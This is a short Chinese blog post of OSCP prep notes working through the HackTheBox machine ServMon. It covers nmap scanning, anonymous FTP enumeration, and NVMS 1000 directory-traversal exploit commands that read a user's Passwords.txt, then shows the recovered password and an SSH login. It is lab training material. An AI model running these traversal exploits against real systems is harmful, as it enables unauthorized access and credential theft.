OSCP备考_0x51_HackThBox靶机_Windows_ServMon

Ethan医生2个月前靶场97

OSCP备考_0x51_HackThBox靶机_Windows_ServMon

10.129.227.77

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.227.77 (扫描TCP)

image.png

image.png

image.png

通过匿名登入ftp


ftp 10.129.227.77  ,发现在Users底下有两个用户

image.png

通过遍历ftp服务,我们发现两个用户nadine和nathan

同时也发现了两个文件

Confidential.txt

'Notes to do.txt'


80端口

image.png



弱口令都没有用

尝试

searchsploit nvms 1000

image.png

目录遍历

python2.7 48311.py 10.129.227.77 users/Nathan/Desktop/Passwords.txt Passwords.txt

没测试成功

使用GOOGLE查询

https://github.com/AleDiBen/NVMS1000-Exploit/tree/master

github下载下里


python nvms.py 10.129.227.77 users/Nathan/Desktop/Passwords.txt Passwords.txt

image.png

爆破发现密码L1k3B1gBut7s@W0rk     


登入ssh nadine@10.129.227.77

标签: OSCP

相关文章

OSCP备考_0x22_HackThBox靶机_Linux_postman

OSCP备考_0x22_HackThBox靶机_Linux_postman

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.20.206 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x12_Vulnhub靶机_Lampião: 1

OSCP备考_0x12_Vulnhub靶机_Lampião: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/lampiao-1,249/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.16...

OSCP备考_0x43_HackThBox靶机_Windows_arctic

OSCP备考_0x43_HackThBox靶机_Windows_arctic

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.249.241 (扫描TCP)http://10.129.249.241:8500/CF...

 OSCP备考_0x11_Vulnhub靶机_IMF: 1

OSCP备考_0x11_Vulnhub靶机_IMF: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/imf-1,162/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168.23...

OSCP备考_0x23_HackThBox靶机_Linux_mango

OSCP备考_0x23_HackThBox靶机_Linux_mango

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.108.26 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x50_HackThBox靶机_Windows_SecNotes

OSCP备考_0x50_HackThBox靶机_Windows_SecNotes

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.243.247 (扫描TCP)http://10.129.243.247/home.ph...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。